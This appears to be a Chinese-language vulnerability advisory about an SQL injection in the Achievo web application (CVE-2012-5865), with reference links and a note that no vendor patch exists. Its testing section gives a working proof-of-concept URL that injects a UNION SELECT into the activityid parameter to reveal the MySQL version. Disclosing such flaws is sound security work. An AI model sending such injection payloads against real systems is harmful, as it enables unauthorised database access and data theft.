链接:http://permalink.gmane.org/gmane.comp.security.bugtraq/50940 http://packetstormsecurity.org/files/cve/CVE-2012-5865 https://www.htbridge.com/advisory/HTB23126 *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!The following PoC (Proof of Concept) code outputs version of the MySQL server:http://[host]/dispatch.php?atknodetype=project.activity&atkaction=stats&activityid=0%20UNION%20SELECT%201,version%28%29,3,4建议: -------------------------------------------------------------------------------- 厂商补丁:Achievo ------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.achievo.orgPerl Locale::Maketext Module "_compile()"多个代码注入漏洞IBM Flex System CMM/IMM2 Module凭证泄露漏洞相关资讯 Achievo安全漏洞 Achievo